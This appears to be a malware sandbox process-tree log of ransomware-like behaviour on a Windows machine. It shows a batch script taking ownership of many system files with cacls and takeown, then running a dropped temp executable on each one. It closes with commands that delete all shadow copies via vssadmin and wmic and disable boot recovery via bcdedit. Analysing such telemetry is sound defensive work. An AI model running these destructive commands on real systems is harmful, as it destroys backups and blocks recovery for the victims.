C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl""2⤵PID:4124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl" /E /G Admin:F /C3⤵PID:1904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl"3⤵PID:2872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl" -nobanner3⤵PID:4372
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "UpdateSessionOrchestration.f17b2ded-6898-4cb9-9f92-dd9cc093201c.1.etl" -nobanner4⤵PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:3676
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:1304
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl""2⤵PID:4268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl" /E /G Admin:F /C3⤵PID:2152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl"3⤵
- Modifies file permissions
PID:4236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl" -nobanner3⤵PID:3076
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl" -nobanner4⤵PID:2640
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl""2⤵PID:4384
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl" /E /G Admin:F /C3⤵PID:2008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl"3⤵
- Modifies file permissions
PID:2476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl" -nobanner3⤵PID:2364
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl" -nobanner4⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""2⤵PID:2680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:3664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4620
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:4624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:2524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:2720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:444
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:4644
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""2⤵PID:3676
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp" /E /G Admin:F /C3⤵PID:1656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp"3⤵
- Modifies file permissions
PID:4496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner3⤵PID:2152
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner4⤵PID:4236
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl""2⤵PID:3076
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl" /E /G Admin:F /C3⤵PID:4956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl" -nobanner3⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl" -nobanner4⤵PID:2080
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl""2⤵PID:2364
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl" /E /G Admin:F /C3⤵PID:2412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl"3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl" -nobanner3⤵PID:4320
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl" -nobanner4⤵PID:456
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:2872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:3840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "device.png" -nobanner3⤵PID:4288
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "device.png" -nobanner4⤵PID:2524
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:1608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵PID:2000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:3708
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""2⤵PID:3080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"3⤵
- Modifies file permissions
PID:3152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "qmgr.jfm" -nobanner3⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "qmgr.jfm" -nobanner4⤵PID:4444
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl""2⤵PID:2384
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl" /E /G Admin:F /C3⤵PID:3076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl"3⤵
- Modifies file permissions
PID:3808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl" -nobanner3⤵PID:288
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl" -nobanner4⤵PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:1904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:2364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵PID:3392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:540
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:4464
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl""2⤵PID:408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl" /E /G Admin:F /C3⤵PID:2872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl"3⤵
- Modifies file permissions
PID:4680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "NotificationUxBroker.a9dd1a22-81be-4049-bb19-ab0498fe0fec.1.etl" -nobanner4⤵PID:1472
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:1232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:2620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:3648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "overlay.png" -nobanner3⤵PID:4616
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "overlay.png" -nobanner4⤵PID:1060
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl""2⤵PID:4208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl" /E /G Admin:F /C3⤵PID:1672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl"3⤵
- Modifies file permissions
PID:3052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl" -nobanner3⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl" -nobanner4⤵PID:3740
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:2004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:2256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Modifies file permissions
PID:504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:288
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:4856
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:1408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:3164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:540
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:4628
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl""2⤵PID:4572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl" /E /G Admin:F /C3⤵PID:2460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl"3⤵PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "MoUsoCoreWorker.554a0be1-cccf-4469-94c3-ed16106ab612.1.etl" -nobanner4⤵PID:4544
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl""2⤵PID:4788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl" /E /G Admin:F /C3⤵PID:4644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl"3⤵
- Modifies file permissions
PID:4236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl" -nobanner3⤵PID:4616
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "WuProvider.1e1a40da-b032-4847-b7da-639ff193cafa.1.etl" -nobanner4⤵PID:4888
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3304
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\O4dQlksE.bat"1⤵PID:2008
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4496
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4268
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:4496
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:4680
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828